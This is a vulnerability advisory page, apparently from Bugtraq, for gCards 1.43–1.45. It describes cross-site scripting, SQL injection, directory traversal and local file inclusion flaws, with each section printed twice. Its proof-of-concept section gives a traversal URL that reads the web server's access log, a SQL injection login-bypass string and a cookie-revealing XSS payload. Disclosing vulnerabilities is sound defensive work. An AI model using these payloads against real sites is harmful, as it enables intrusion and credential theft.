gCards Multiple Input Validation Vulnerabilities
BID:17165
Info
gCards Multiple Input Validation Vulnerabilities
| Bugtraq ID: | 17165 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 20 2006 12:00AM |
| Updated: | Mar 21 2006 09:09PM |
| Credit: | rgod is credited with the discovery of these vulnerabilities. |
| Vulnerable: |
gCards gCards 1.43 gCards gCards 1.45 gCards gCards 1.44 |
| Not Vulnerable: | |
Discussion
gCards Multiple Input Validation Vulnerabilities
The gCards application is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. The following vulnerabilities can occur:
- Cross-site scripting
- SQL injection
- directory traversal
- local file include.
An attacker can access sensitive information, possibly obtain authentication credentials, manipulate SQL query logic to compromise data, and retrieve arbitrary files from the vulnerable system in the context of the webserver process.
The gCards application is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. The following vulnerabilities can occur:
- Cross-site scripting
- SQL injection
- directory traversal
- local file include.
An attacker can access sensitive information, possibly obtain authentication credentials, manipulate SQL query logic to compromise data, and retrieve arbitrary files from the vulnerable system in the context of the webserver process.
Exploit / POC
gCards Multiple Input Validation Vulnerabilities
The following proof-of-concept examples are available:
http://www.example.com/index.php?setLang=suntzu&lang[suntzu][file=../../../../../../../../../../../var/log/httpd/access_log
username: 'or'suntzu'='suntzu'/*
password: [whatever]
http://www.example.com/index.php?setLang=suntzu&lang[suntzu][file]=%3Cscript%3Ealert(document.cookie)%3C/script%3E
Exploit code has been provided.
The following proof-of-concept examples are available:
http://www.example.com/index.php?setLang=suntzu&lang[suntzu][file=../../../../../../../../../../../var/log/httpd/access_log
username: 'or'suntzu'='suntzu'/*
password: [whatever]
http://www.example.com/index.php?setLang=suntzu&lang[suntzu][file]=%3Cscript%3Ealert(document.cookie)%3C/script%3E
Exploit code has been provided.
Solution / Fix
gCards Multiple Input Validation Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected]:[email protected]
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected]:[email protected]
References
gCards Multiple Input Validation Vulnerabilities
References:
References:
- gCard Web Site (gCard)
- gCards <= 1.45 multiple vulnerabilities (rgod)